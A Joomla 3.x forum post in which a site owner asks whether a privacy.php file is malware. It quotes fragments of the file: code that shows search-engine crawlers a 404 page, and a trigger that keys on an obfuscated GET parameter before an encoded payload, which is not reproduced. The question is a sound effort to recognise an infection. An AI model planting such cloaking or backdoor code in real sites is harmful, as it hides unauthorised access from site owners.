Do I need privacy.php and is it infected?

Discussion regarding Joomla! 3.x security issues.

Moderators: Bernard T, mandville, fcoulter, PhilD, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
scifivision
Joomla! Enthusiast
Joomla! Enthusiast

Do I need privacy.php and is it infected?

Post by scifivision » Wed Sep 18, 2019 2:34 am

Is there supposed to be a privacy.php file inside the main joomla directory? I think this may be part of an injected virus. Tech support for the server sent me flagged some questionable files. And if it's infected, before you say you need to reinstall the whole site etc. and update all the plugins, yes I know and am going to do just that, but I am trying to first understand if it's infected, exactly what it means so I can recognize this in the future. I noticed my other joomla installs didn't have the file.

Some of the code to me looks legit, but I don't know a lot about the code. This is the part I didn't know about:

Code: Select all

<?php

// Preventing a directory listing

if(!empty($_SERVER["HTTP_USER_AGENT"])) {  
I don't know what it does, so I didn't want to just delete the whole file. This code however, I'm pretty sure is bad, because you have to scroll far over to see it:

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

if(preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {

header("HTTP/1.0 404 Not Found");exit;

}

}          
and

if (isset($_GET[str_rot13(pack("H*", "6c6268737661717667"))])) {$_F=__FILE__;$_X="
and then a huge string of numbers.